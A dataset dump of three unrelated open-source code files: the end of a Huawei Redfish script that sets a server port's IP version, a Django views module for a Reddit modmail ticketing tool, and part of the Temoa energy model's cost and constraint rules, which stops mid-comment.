Query @Message.ExtendedInf\n # @Param:resp_ver\n # @Return:\n # @author:\n #====================================================================================\n '''\n ck_message = \"\"\n mess_ver = resp_ver.get(\"@Message.ExtendedInfo\", \"\")\n if len(mess_ver) != 0:\n ck_message = resp_ver[\"@Message.ExtendedInfo\"]\n else:\n print('Success: successfully completed request')\n return None\n # Determine whether a permission problem occurs.\n if ck_message[0]['MessageId'] == \\\n \"iBMC.1.0.PropertyModificationNeedPrivilege\" or \\\n ck_message[0]['MessageId'] == \\\n \"Base.1.0.InsufficientPrivilege\":\n print('Failure: you do not have the required' + \\\n ' permissions to perform this operation')\n return None\n # IP version error messages\n if code_ipv == 400:\n sys.stdout.write('Failure: ')\n all_err(ck_message)\n return None\n # Display 200 messages independently.\n if code_ipv == 200:\n print(FAILURE_MESS)\n part_err(ck_message)\n sys.exit(144)\n return resp_ver\n\n\ndef set_version_info(members_uri, client, args):\n '''\n #===========================================================\n # @Method: Set DNS information.\n # @Param:members_uri, client, args\n # @Return:\n # @date: 2017.8.1\n #===========================================================\n '''\n # Encapsulate the request body.\n payload = {}\n package_request(args, payload)\n resp_ver = client.get_resource(members_uri)\n if resp_ver is None:\n return None\n elif resp_ver['status_code'] != 200:\n if resp_ver['status_code'] == 404:\n print('Failure: resource was not found')\n return resp_ver\n resp_ver = client.set_resource(members_uri, payload)\n if resp_ver is None:\n return None\n if resp_ver['status_code'] == 200:\n check_err_info(resp_ver['resource'], resp_ver['status_code'])\n if resp_ver['status_code'] == 400:\n check_err_info(resp_ver['message']['error'], resp_ver['status_code'])\n return resp_ver\n\n\ndef get_port_collection(client, slotid, args):\n '''\n #===========================================================\n # @Method: Query collection information.\n # @Param:client, slotid\n # @Return:\n # @date: 2017.8.1 11:27\n #===========================================================\n '''\n url = \"/redfish/v1/managers/%s/EthernetInterfaces\" % slotid\n resp_ver = client.get_resource(url)\n if resp_ver is None:\n return None\n elif resp_ver['status_code'] != 200:\n if resp_ver['status_code'] == 404:\n print('Failure: resource was not found')\n return resp_ver\n members_count = resp_ver['resource'][\"Members@odata.count\"]\n if members_count == 0:\n print(\"no data available for the resource\")\n return resp_ver\n # Set information.\n else:\n members_uri = resp_ver['resource']['Members'][0][\"@odata.id\"]\n resp_ver = set_version_info(members_uri, client, args)\n return resp_ver\n\n\ndef setipversion(client, parser, args):\n '''\n #===========================================================\n # @Method: setipversion command processing functions\n # @Param:client, parser, args\n # @Return:\n # @date: 2017.8.1\n #===========================================================\n '''\n if args.IPVersion is None:\n parser.error('at least one parameter must be specified')\n slotid = client.get_slotid()\n if slotid is None:\n return None\n # Query collection information.\n ret = get_port_collection(client, slotid, args)\n return 
ret\n","repo_name":"Huawei/Server_Management_Plugin_Puppet","sub_path":"src/files/REST-Linux/scripts/set_ipversion.py","file_name":"set_ipversion.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"39034030365","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse, HttpResponseForbidden, HttpResponseBadRequest, Http404\nfrom django.views.decorators.http import require_safe, require_POST, require_GET\nfrom django.contrib import auth\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom main.forms import SubredditForm\nfrom main.templatetags.stringify import get_status_class, get_status_label_class, get_status_string\n\nfrom .models import Subreddit, Redditor, Ticket\nfrom .func import reddit_util\n\n@require_safe\ndef index(request):\n\treturn render_main_page(request)\n\n@require_safe\ndef help(request):\n\traise Http404()\n\n@require_safe\ndef subreddit_all(request, subreddit):\n\treturn render_main_page(request, subreddit)\n\n@require_safe\ndef subreddit_open(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.OPEN)\n\n@require_safe\ndef subreddit_active(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.ACTIVE)\n\n@require_safe\ndef subreddit_closed(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.CLOSED)\n\n@require_safe\ndef subreddit_ignored(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.IGNORED)\n\n@require_safe\ndef subreddit_mine(request, subreddit):\n\treturn render_main_page(request, subreddit, custom_filter=\"mine\")\n\ndef render_main_page(request, subreddit=None, status_filter=None, custom_filter=None, order=None, limit=100):\n\tif subreddit is None:\n\t\treturn render(request, \"main/index.jinja\")\n\t\n\t# Subreddit info\n\tsubreddit = get_subreddit(subreddit)\n\tif subreddit is None:\n\t\treturn render_subreddit_404(request, subreddit)\n\tif not subreddit.user_moderates(request.user) or not subreddit.enabled:\n\t\treturn render_subreddit_401(request, subreddit)\n\t\n\t# Get ticket list\n\tprint(\"Status: {}\".format(status_filter))\n\tif status_filter is not None:\n\t\ttickets = subreddit.get_status_tickets(status_filter)\n\telif custom_filter is not None:\n\t\tif custom_filter == \"mine\":\n\t\t\ttickets = subreddit.get_user_tickets(request.user.redditor)\n\t\telse:\n\t\t\tprint(\"Warning: Invalid custom ticket filter\")\n\t\t\ttickets = subreddit.ticket_set.all()\n\telse:\n\t\ttickets = subreddit.ticket_set.all()\n\t\n\t# Apply modifiers to ticket list\n\ttickets = tickets.order_by(\"-id\" if order is None else order)\n\ttickets = tickets[:limit]\n\t\n\treturn render(request, \"main/subreddit.jinja\", {\"subreddit\": subreddit, \"tickets\": tickets, \"status_filter\": status_filter, \"custom_filter\": custom_filter})\n\n@login_required\ndef subreddit_config(request, subreddit):\n\t# Subreddit info\n\tsubreddit = get_subreddit(subreddit)\n\tif subreddit is None:\n\t\treturn render_subreddit_404(request, subreddit)\n\tif not subreddit.user_moderates(request.user) or not subreddit.enabled:\n\t\treturn render_subreddit_401(request, subreddit)\n\t\n\tif request.method == \"POST\":\n\t\tform = SubredditForm(request.POST, instance=subreddit)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect(\"main:subreddit\", 
subreddit.name)\n\telse:\n\t\tform = SubredditForm(instance=subreddit)\n\t\treturn render(request, \"main/subreddit_config.jinja\", {\"subreddit\": subreddit, \"form\": form, \"custom_filter\": \"settings\"})\n\n# Authentication\n\ndef logout(request):\n\t#request.session[\"token\"] = None\n\t#request.session.flush()\n\tauth.logout(request)\n\treturn redirect(\"/\")\n\n# Other\n\ndef handler404(request):\n\tresp = render(request, \"main/404.jinja\")\n\tresp.status_code = 404\n\treturn resp\n\n# API methods\n\n@login_required\n@require_POST\ndef modify_ticket(request, ticket_id):\n\tprint(\"Modifying ticket {}\".format(ticket_id))\n\tticket = get_object_or_404(Ticket, id=ticket_id)\n\tif not ticket.subreddit.user_moderates(request.user):\n\t\treturn HttpResponseForbidden()\n\t\n\tdef finalize_success():\n\t\tticket.modified_by = request.user.redditor\n\t\tticket.save()\n\t\n\t# Find and perform the operation\n\tif \"inc_status\" in request.GET:\n\t\tinc_status = request.GET[\"inc_status\"]\n\t\tstatus = Ticket.Status[inc_status.upper()]\n\t\t# Increment the status\n\t\tif status < Ticket.Status.CLOSED:\n\t\t\tstatus += 1\n\t\telse:\n\t\t\treturn JsonResponse({\"success\": False})\n\t\t\n\t\t# Update status\n\t\tticket.status = status\n\t\tfinalize_success()\n\t\t\n\t\treturn JsonResponse({\n\t\t\t\"success\": True,\n\t\t\t\"status\": get_status_class(status),\n\t\t\t\"status_class\": get_status_label_class(status),\n\t\t\t\"status_text\": get_status_string(status)\n\t\t})\n\tif \"set_status\" in request.GET:\n\t\tset_status = request.GET[\"set_status\"]\n\t\tstatus = Ticket.Status[set_status.upper()]\n\t\t\n\t\t# Update status\n\t\tticket.status = status\n\t\tfinalize_success()\n\t\t\n\t\treturn JsonResponse({\n\t\t\t\"success\": True,\n\t\t\t\"status\": get_status_class(status),\n\t\t\t\"status_class\": get_status_label_class(status),\n\t\t\t\"status_text\": get_status_string(status)\n\t\t})\n\tif \"set_flagged\" in request.GET:\n\t\tset_flagged = request.GET[\"set_flagged\"] == \"1\"\n\t\tif (set_flagged and not ticket.is_flagged) or (not set_flagged and ticket.is_flagged):\n\t\t\tticket.is_flagged = set_flagged\n\t\t\tticket.save()\n\t\t\tprint(ticket.is_flagged)\n\t\t\n\t\treturn JsonResponse({\n\t\t\t\"success\": True,\n\t\t\t\"flagged\": set_flagged\n\t\t})\n\t\n\treturn HttpResponseBadRequest()\n\n@login_required\n@require_GET\ndef get_message_body(request, ticket_id):\n\tprint(\"Getting message text {}\".format(ticket_id))\n\tticket = get_object_or_404(Ticket, id=ticket_id)\n\tif not ticket.subreddit.user_moderates(request.user):\n\t\treturn HttpResponseForbidden()\n\t\n\tif ticket.type == Ticket.Type.BAN:\n\t\tmessage = reddit_util.get_message_body_html(request.user, ticket.message.id, offset=1)\n\telse:\n\t\tmessage = reddit_util.get_message_body_html(request.user, ticket.message.id)\n\t\n\tif message:\n\t\treturn JsonResponse({\n\t\t\t\t\"success\": True,\n\t\t\t\t\"message\": message,\n\t\t\t})\n\t\n\treturn JsonResponse({\n\t\t\t\"success\": False\n\t\t})\n\n# Util\n\ndef get_subreddit(subreddit):\n\ttry:\n\t\treturn Subreddit.objects.get(name=subreddit)\n\texcept Subreddit.DoesNotExist:\n\t\treturn None\n\texcept Subreddit.MultipleObjectsReturned:\n\t\tprint(\"This should never happen!\")\n\t\treturn None\n\ndef render_subreddit_404(request, subreddit):\n\treturn render(request, \"main/subreddit_error.jinja\", {\"subreddit\": subreddit, \"error\": \"that subreddit does not exist\"})\n\ndef render_subreddit_401(request, subreddit):\n\treturn render(request, 
\"main/subreddit_error.jinja\", {\"subreddit\": subreddit, \"error\": \"you are not authorized to view that subreddit\"})\n","repo_name":"TheEnigmaBlade/reddit-modmail-ticketer","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"14729000691","text":"from __future__ import division\n\nfrom temoa_initialize import *\n\n\n##############################################################################\n# Begin *_rule definitions\n\ndef TotalCost_rule(M):\n r\"\"\"\nUsing the :code:`Activity` and :code:`Capacity` variables, the Temoa objective\nfunction calculates the costs associated with supplying the system with energy,\nunder the assumption that all costs are paid for through loans (rather than with\nlump-sum sales). This implementation sums up all the costs incurred by the\nsolution, and is defined as :math:`C_{tot} = C_{loans} + C_{fixed} + C_{variable}`.\nSimilarly, each term on the right-hand side is merely a summation of the costs\nincurred, multiplied by an annual discount factor to calculate the discounted\ncost in year :math:`\\text{P}_0`.\n\n.. math::\n :label: obj_loan\n\n C_{loans} = \\sum_{t, v \\in \\Theta_{IC}} \\left (\n \\left [\n IC_{t, v}\n \\cdot LA_{t, v}\n \\cdot \\frac{(1 + GDR)^{P_0 - v +1} \\cdot (1 - (1 + GDR)^{-{LLN}_{t, v}})}{GDR}\n \\cdot \\frac{ 1-(1+GDR)^{-LPA_{t,v}} }{ 1-(1+GDR)^{-LP_{t,v}} }\n \\right ]\n \\cdot \\textbf{CAP}_{t, v}\n \\right )\n\nNote that we calculate loan costs by using depreciation. If a technology is decommissioned after end of model horizon, then only the amount of the asset cost that is depreciated before end of model horizon will be included in the objective function. We use :math:`\\frac{ 1-(1+GDR)^{-LPA_{t,v}} }{ 1-(1+GDR)^{-LP_{t,v}} }` to calculate the depreciation expense, where :math:`LPA_{t,v}` represents active life time of a process :math:`(t,v)` before end of model horizon.\n\n.. math::\n :label: obj_fixed\n\n C_{fixed} = \\sum_{p, t, v \\in \\Theta_{FC}} \\left (\n \\left [\n FC_{p, t, v}\n \\cdot \\frac{(1 + GDR)^{P_0 - p +1} \\cdot (1 - (1 + GDR)^{-{MPL}_{t, v}})}{GDR}\n \\right ]\n \\cdot \\textbf{CAP}_{t, v}\n \\right )\n\n.. 
math::\n :label: obj_variable\n\n C_{variable} = \\sum_{p, t, v \\in \\Theta_{VC}} \\left (\n MC_{p, t, v}\n \\cdot\n \\frac{\n (1 + GDR)^{P_0 - p + 1} \\cdot (1 - (1 + GDR)^{-{MPL}_{p,t, v}})\n }{\n GDR\n }\n \\cdot \\textbf{ACT}_{t, v}\n \\right )\n\n\"\"\"\n return sum(PeriodCost_rule(M, p) for p in M.time_optimize)\n\n\ndef PeriodCost_rule(M, p):\n P_0 = min(M.time_optimize)\n P_e = M.time_future.last() # End point of modeled horizon\n GDR = value(M.GlobalDiscountRate)\n MLL = M.ModelLoanLife\n MPL = M.ModelProcessLife\n x = 1 + GDR # convenience variable, nothing more.\n\n loan_costs = sum(\n M.V_Capacity[S_t, S_v]\n * (\n value(M.CostInvest[S_t, S_v])\n * value(M.LoanAnnualize[S_t, S_v])\n * (value(M.LifetimeLoanProcess[S_t, S_v]) if not GDR else\n (x ** (P_0 - S_v + 1) * (1 - x ** (-value(M.LifetimeLoanProcess[S_t, S_v]))) / GDR)\n )\n )\n * (\n (\n 1 - x ** (-min(value(M.LifetimeProcess[S_t, S_v]), P_e - S_v))\n )\n / (\n 1 - x ** (-value(M.LifetimeProcess[S_t, S_v]))\n )\n )\n\n for S_t, S_v in M.CostInvest.sparse_iterkeys()\n if S_v == p\n )\n\n fixed_costs = sum(\n M.V_Capacity[S_t, S_v]\n * (\n\t\t\t\tvalue(M.CostFixed[p, S_t, S_v]) * value(M.FOMIncrease[p, S_t]) # sudan\n\t\t\t\t* (value(MPL[p, S_t, S_v]) if not GDR else\n (x ** (P_0 - p + 1) * (1 - x ** (-value(MPL[p, S_t, S_v]))) / GDR)\n )\n )\n\n for S_p, S_t, S_v in M.CostFixed.sparse_iterkeys()\n if S_p == p\n )\n\n variable_costs = sum(\n M.V_ActivityByPeriodAndProcess[p, S_t, S_v]\n * (\n value(M.CostVariable[p, S_t, S_v])\n * (value(MPL[p, S_t, S_v]) if not GDR else\n (x ** (P_0 - p + 1) * (1 - x ** (-value(MPL[p, S_t, S_v]))) / GDR)\n )\n )\n\n for S_p, S_t, S_v in M.CostVariable.sparse_iterkeys()\n if S_p == p\n )\n\n period_costs = (loan_costs + fixed_costs + variable_costs)\n return period_costs\n\n\n##############################################################################\n# Initializaton rules\n\n\ndef ParamModelLoanLife_rule(M, t, v):\n loan_length = value(M.LifetimeLoanProcess[t, v])\n mll = min(loan_length, max(M.time_future) - v)\n\n return mll\n\n\ndef ParamModelProcessLife_rule(M, p, t, v):\n life_length = value(M.LifetimeProcess[t, v])\n tpl = min(v + life_length - p, value(M.PeriodLength[p]))\n\n return tpl\n\n\ndef ParamPeriodLength(M, p):\n # This specifically does not use time_optimize because this function is\n # called /over/ time_optimize.\n periods = sorted(M.time_future)\n\n i = periods.index(p)\n\n # The +1 won't fail, because this rule is called over time_optimize, which\n # lacks the last period in time_future.\n length = periods[i + 1] - periods[i]\n\n return length\n\n\ndef ParamPeriodRate(M, p):\n \"\"\"\\\nThe \"Period Rate\" is a multiplier against the costs incurred within a period to\nbring the time-value back to the base year. The parameter PeriodRate is not\ndirectly specified by the modeler, but is a convenience calculation based on the\nGlobalDiscountRate and the length of each period. One may refer to this\n(pseudo) parameter via M.PeriodRate[ a_period ]\n\"\"\"\n rate_multiplier = sum(\n (1 + M.GlobalDiscountRate) ** (M.time_optimize.first() - p - y)\n\n for y in range(0, M.PeriodLength[p])\n )\n\n return value(rate_multiplier)\n\n\ndef ParamProcessLifeFraction_rule(M, p, t, v):\n \"\"\"\\\n\nCalculate the fraction of period p that process operates.\n\nFor most processes and periods, this will likely be one, but for any process\nthat will cease operation (rust out, be decommissioned, etc.) 
between periods,\ncalculate the fraction of the period that the technology is able to\ncreate useful output.\n\"\"\"\n eol_year = v + value(M.LifetimeProcess[t, v])\n frac = eol_year - p\n period_length = value(M.PeriodLength[p])\n if frac >= period_length:\n # try to avoid floating point round-off errors for the common case.\n return 1\n\n # number of years into final period loan is complete\n\n frac /= float(period_length)\n return frac\n\n\ndef ParamLoanAnnualize_rule(M, t, v):\n dr = value(M.DiscountRate[t, v])\n lln = value(M.LifetimeLoanProcess[t, v])\n if not dr:\n return 1.0 / lln\n annualized_rate = (dr / (1.0 - (1.0 + dr) ** (-lln)))\n\n return annualized_rate\n\n\n# End initialization rules\n##############################################################################\n\n##############################################################################\n# Constraint rules\n\ndef BaseloadDiurnal_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThere exists within the electric sector a class of technologies whose\nthermodynamic properties are impossible to change over a short period of time\n(e.g. hourly or daily). These include coal and nuclear power plants, which\ntake weeks to bring to an operational state, and similarly require weeks to\nfully shut down. Temoa models this behavior by forcing technologies in the\n:code:`tech_baseload` set to maintain a constant output for all daily slices.\nNote that this allows the model to (not) use a baseload process in a season, and\nonly applies over the :code:`time_of_day` set.\n\nIdeally, this constraint would not be necessary, and baseload processes would\nsimply not have a :math:`d` index. However, implementing the more efficient\nfunctionality is currently on the Temoa TODO list.\n\n.. math::\n :label: BaseloadDaily\n\n SEG_{s, D_0}\n \\cdot \\textbf{ACT}_{p, s, d, t, v}\n =\n SEG_{s, d}\n \\cdot \\textbf{ACT}_{p, s, D_0, t, v}\n\n \\\\\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{baseload}}\n\"\"\"\n # Question: How to set the different times of day equal to each other?\n\n # Step 1: Acquire a \"canonical\" representation of the times of day\n l_times = sorted(M.time_of_day) # i.e. a sorted Python list.\n # This is the commonality between invocations of this method.\n\n index = l_times.index(d)\n if 0 == index:\n # When index is 0, it means that we've reached the beginning of the array\n # For the algorithm, this is a terminating condition: do not create\n # an effectively useless constraint\n return Constraint.Skip\n\n # Step 2: Set the rest of the times of day equal in output to the first.\n # i.e. create a set of constraints that look something like:\n # tod[ 2 ] == tod[ 1 ]\n # tod[ 3 ] == tod[ 1 ]\n # tod[ 4 ] == tod[ 1 ]\n # and so on ...\n d_0 = l_times[0]\n\n # Step 3: the actual expression. For baseload, must compute the /average/\n # activity over the segment. By definition, average is\n # (segment activity) / (segment length)\n # So: (ActA / SegA) == (ActB / SegB)\n # computationally, however, multiplication is cheaper than division, so:\n # (ActA * SegB) == (ActB * SegA)\n expr = (\n M.V_Activity[p, s, d, t, v] * M.SegFrac[s, d_0]\n ==\n M.V_Activity[p, s, d_0, t, v] * M.SegFrac[s, d]\n )\n return expr\n\n\ndef EmissionLimit_Constraint(M, p, e):\n r\"\"\"\n\nA modeler can track emissions through use of the :code:`commodity_emissions`\nset and :code:`EmissionActivity` parameter. The :math:`EAC` parameter is\nanalogous to the efficiency table, tying emissions to a unit of activity. 
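# --- Illustrative aside (not from the original model) -----------------------
# ParamLoanAnnualize_rule above is the standard capital recovery factor,
# annualized_rate = dr / (1 - (1 + dr)**-n), falling back to straight-line
# 1/n when the technology-specific discount rate is zero. A standalone
# numeric check with made-up inputs:
def loan_annualize(dr, n):
    if not dr:
        return 1.0 / n
    return dr / (1.0 - (1.0 + dr) ** (-n))

assert loan_annualize(0.0, 20) == 0.05           # zero rate: pay 1/20 per year
assert abs(loan_annualize(0.05, 20) - 0.0802426) < 1e-6
# i.e. each unit of overnight cost financed at 5% over 20 years costs
# roughly 0.08 per year.
# ---------------------------------------------------------------------------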
The\nEmissionLimit constraint allows the modeler to assign an upper bound per period\nto each emission commodity.\n\n.. math::\n :label: EmissionLimit\n\n \\sum_{I,T,V,O|{e,i,t,v,o} \\in EAC_{ind}} \\left (\n EAC_{e, i, t, v, o} \\cdot \\textbf{FO}_{p, s, d, i, t, v, o}\n \\right )\n \\le\n ELM_{p, e}\n\n \\\\\n \\forall \\{p, e\\} \\in ELM_{ind}\n\"\"\"\n emission_limit = M.EmissionLimit[p, e]\n\n actual_emissions = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, S_t, S_v, S_o]\n * M.EmissionActivity[e, S_i, S_t, S_v, S_o]\n\n for tmp_e, S_i, S_t, S_v, S_o in M.EmissionActivity.sparse_iterkeys()\n if tmp_e == e\n if M.ValidActivity(p, S_t, S_v)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if int is type(actual_emissions):\n msg = (\"Warning: No technology produces emission '%s', though limit was \"\n 'specified as %s.\\n')\n SE.write(msg % (e, emission_limit))\n return Constraint.Skip\n\n expr = (actual_emissions <= emission_limit)\n return expr\n\n\ndef MinCapacity_Constraint(M, p, t):\n r\"\"\" See MaxCapacity_Constraint \"\"\"\n\n min_cap = value(M.MinCapacity[p, t])\n expr = (M.V_CapacityAvailableByPeriodAndTech[p, t] >= min_cap)\n return expr\n\n\ndef MaxCapacity_Constraint(M, p, t):\n r\"\"\"\n\nThe MinCapacity and MaxCapacity constraints set limits on the what the model is\nallowed to (not) have available of a certain technology. Note that the indices\nfor these constraints are period and tech_all, not tech and vintage.\n\n.. math::\n :label: MinCapacityCapacityAvailableByPeriodAndTech\n\n \\textbf{CAPAVL}_{p, t} \\ge MIN_{p, t}\n\n \\forall \\{p, t\\} \\in \\Theta_{\\text{MinCapacity parameter}}\n\n.. math::\n :label: MaxCapacity\n\n \\textbf{CAPAVL}_{p, t} \\le MAX_{p, t}\n\n \\forall \\{p, t\\} \\in \\Theta_{\\text{MaxCapacity parameter}}\n\"\"\"\n max_cap = value(M.MaxCapacity[p, t])\n expr = (M.V_CapacityAvailableByPeriodAndTech[p, t] <= max_cap)\n return expr\n\n\ndef MinCapacitySet_Constraint(M, p):\n r\"\"\" See MinCapacity_Constraint \"\"\"\n min_cap = value(M.MinCapacitySum[p])\n aggcap = sum(M.V_CapacityAvailableByPeriodAndTech[p, t]\n for t in M.tech_capacity_min\n )\n expr = (aggcap >= min_cap)\n return expr\n\n\ndef MaxCapacitySet_Constraint(M, p):\n r\"\"\" See MaxCapacity_Constraint \"\"\"\n max_cap = value(M.MaxCapacitySum[p])\n aggcap = sum(M.V_CapacityAvailableByPeriodAndTech[p, t]\n for t in M.tech_capacity_max\n )\n expr = (aggcap <= max_cap)\n return expr\n\n\ndef MaxActivity_Constraint(M, p, t):\n r\"\"\"\n\nThe MaxActivity sets an upper bound on the activity from a specific technology. Note that the indices\nfor these constraints are period and tech_all, not tech and vintage.\n\n\"\"\"\n\n activity_pt = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t)\n )\n max_act = value(M.MaxActivity[p, t])\n expr = (activity_pt <= max_act)\n return expr\n\n\ndef MinActivity_Constraint(M, p, t):\n r\"\"\"\n\nThe MinActivity sets a lower bound on the activity from a specific technology. 
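# --- Illustrative aside (not from the original model) -----------------------
# The Max/MinActivity rules above bound *annual* activity, i.e. V_Activity
# summed over every (season, time-of-day, vintage) combination for the
# period/technology pair. The same aggregation in plain Python, with toy
# numbers only:
toy_activity = {                       # (season, time-of-day, vintage) -> PJ
    ("summer", "day", 2015): 4.0,
    ("summer", "night", 2015): 1.5,
    ("winter", "day", 2020): 3.0,
}
annual_activity = sum(toy_activity.values())      # 8.5
max_act, min_act = 10.0, 5.0
assert min_act <= annual_activity <= max_act      # both bounds satisfied
# ---------------------------------------------------------------------------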
Note that the indices\nfor these constraints are period and tech_all, not tech and vintage.\n\n\"\"\"\n\n activity_pt = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t)\n )\n min_act = value(M.MinActivity[p, t])\n expr = (activity_pt >= min_act)\n return expr\n\n\ndef MinActivityGroup_Constraint(M, p, g):\n g_techs = set()\n for i in M.GroupOfTechnologies.value:\n if i[1] == g:\n g_techs.add(i[0])\n activity_p = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n\n for t in g_techs\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t)\n )\n min_act = value(M.MinGenGroupOfTechnologies_Data[p, g])\n expr = (activity_p >= min_act)\n return expr\n\n\n# def Storage_Constraint ( M, p, s, i, t, v, o ):\n# \tr\"\"\"\n#\n# Temoa's algorithm for storage is to ensure that the amount of energy entering\n# and leaving a storage technology is balanced over the course of a day,\n# accounting for the conversion efficiency of the storage process. This\n#\n# constraint relies on the assumption that the total amount of storage-related\n# energy is small compared to the amount of energy required by the system over a\n# season. If it were not, the algorithm would have to account for\n# season-to-season transitions, which would require an ordering of seasons within\n# the model. Currently, each slice is completely independent of other slices.\n#\n# .. math::\n# :label: Storage\n#\n# \\sum_{D} \\left (\n# EFF_{i, t, v, o}\n# \\cdot \\textbf{FI}_{p, s, d, i, t, v, o}\n# - \\textbf{FO}_{p, s, d, i, t, v, o}\n# \\right )\n# = 0\n#\n# \\forall \\{p, s, i, t, v, o\\} \\in \\Theta_{\\text{storage}}\n# \"\"\"\n# \ttotal_out_in = sum(\n# \t M.Efficiency[i, t, v, o]\n# \t * M.V_FlowIn[p, s, S_d, i, t, v, o]\n# \t - M.V_FlowOut[p, s, S_d, i, t, v, o]\n#\n# \t for S_d in M.time_of_day\n# \t)\n#\n# \texpr = ( total_out_in == 0 )\n# \treturn expr\n\n# def HourlyStorage_Constraint ( M, p, s, d, t ):\n#\n# \tInitialStorage = 0\t#batteries are assumed delivered uncharged\n#\n# \t#this is the sum of all input=i sent TO storage tech t of vintage v with output=o in P,S,D, (in PJ)\n# \tcharge = sum( M.V_FlowIn[p, s, d, S_i, t, S_v, S_o] * M.Efficiency[S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_i in M.ProcessInputs( p, t, S_v )\n# \t for S_o in M.ProcessOutputsByInput( p, t, S_v, S_i )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \t#this is the sum of all output=o withdrawn FROM storage tech t of vintage v with input=i P,S,D, (in PJ)\n# \tdischarge = sum( M.V_FlowOut[p, s, d, S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_o in M.ProcessOutputs( p, t, S_v )\n# \t for S_i in M.ProcessInputsByOutput( p, t, S_v, S_o )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \tstored_energy = charge - discharge\n#\n# # this hourly storage formulation allows stored energy to carry over through time of day and seasons, but must be zeroed out at the end of each period\n#\n# \tif d == M.time_of_day.last() and s == M.time_season.last(): #last time slice of the last season (aka end of period), must zero out\n# \t\td_prev = M.time_of_day.prev(d)\n# \t\texpr = ( M.V_HourlyStorage[p, s, d_prev, t] + stored_energy == 0 )\n#\n# \telif d == M.time_of_day.first() and s == M.time_season.first(): #first time slice of the first season (aka start of period), starts at zero\n# \t\texpr = ( M.V_HourlyStorage[p,s,d,t] == stored_energy )\n#\n# \telif d == M.time_of_day.first(): #first time slice of any season that is NOT 
the first season\n# \t\td_last = M.time_of_day.last()\n# \t\ts_prev = M.time_season.prev(s)\n# \t\texpr = ( M.V_HourlyStorage[p,s,d,t] == M.V_HourlyStorage[p,s_prev,d_last,t] + stored_energy )\n#\n# \telse: #so this is any time slice that is NOT covered above (so not the period end time slice; not the period beginning time slice; and not the first time slice of any season)\n# \t\td_prev = M.time_of_day.prev(d)\n# \t\texpr = ( M.V_HourlyStorage[p,s,d,t] == M.V_HourlyStorage[p,s,d_prev,t] + stored_energy )\n#\n# \treturn expr\n#\n# def HourlyStorage_UpperBound ( M, p, s, d, t ):\n# \t# V_HourlyStorage is in terms of PJ; so in any single time slice, amount of cumulative stored energy cannot exceed capacity (GW) * 8 (hours) = GWh\n# \t# need to convert GWh capacity to PJ (3600/10^6)\n#\n# \tenergy_capacity = M.V_CapacityAvailableByPeriodAndTech[p,t] * 8 * 3600 / 10**6\n#\n# #\tenergy_capacity = M.V_CapacityAvailableByPeriodAndTech[p,t] * value( M.CapacityToActivity[t] ) * value( M.SegFrac[s,d] ) * 8\n#\n# \texpr = ( M.V_HourlyStorage[p,s,d,t] <= energy_capacity )\n#\n# \treturn expr\n#\n# def HourlyStorage_LowerBound ( M, p, s, d, t ):\n# \t# V_HourlyStorage is in terms of PJ; so in any single time slice, amount of cumulative stored energy cannot dip below some minimum value (zero)\n# \t# need to convert GWh capacity to PJ (3600/10^6)\n#\n# \texpr = (M.V_HourlyStorage[p,s,d,t] >= 0) #no minimum charge, can achieve 100% DOD\n#\n# \treturn expr\n#\n# def HourlyStorageCharge_UpperBound ( M, p, s, d, t ):\n# \t# This must limit the rate that energy (PJ) can flow into the battery - limited by the battery size (capacity in GW)\n# \t# The battery capacity is defined by GW (GJ/s). Convert GJ/s to PJ/h, and this is the maximum that can flow into the battery in 1 hour\n#\n# #\thourly_charge = sum( M.V_FlowIn[p, s, d, S_i, t, S_v, S_o] * M.Efficiency[S_i, t, S_v, S_o]\n# #\t for S_v in ProcessVintages( p, t )\n# #\t for S_i in ProcessInputs( p, t, S_v )\n# #\t for S_o in ProcessOutputsByInput( p, t, S_v, S_i )\n# #\t)\n# #\n# #\tmax_charge = M.V_CapacityAvailableByPeriodAndTech[p,t] * 3600/10**6 #converts GWh to PJ, treats each time slice as 1 hour\n#\n#\n# \thourly_charge = sum( M.V_FlowIn[p, s, d, S_i, t, S_v, S_o] * M.Efficiency[S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_i in M.ProcessInputs( p, t, S_v )\n# \t for S_o in M.ProcessOutputsByInput( p, t, S_v, S_i )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \tmax_charge = M.V_CapacityAvailableByPeriodAndTech[p,t] * 3600/10**6\t #converts GWh to PJ, treats each time slice as 92 hours\n#\n# \texpr = ( hourly_charge <= max_charge ) #energy charge rate cannot exceed the capacity of the battery (in GW)\n#\n# \treturn expr\n#\n# def HourlyStorageCharge_LowerBound ( M, p, s, d, t ):\n# \t# This must limit the rate that energy (PJ) can flow out of the battery - limited by the battery size (capacity in GW)\n# \t# The battery capacity is defined by GW (GJ/s). 
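# --- Illustrative aside (not from the original model) -----------------------
# Unit arithmetic behind the 3600 / 10**6 factor in the commented-out
# storage bounds above: capacity in GW is GJ per second, so one hour of
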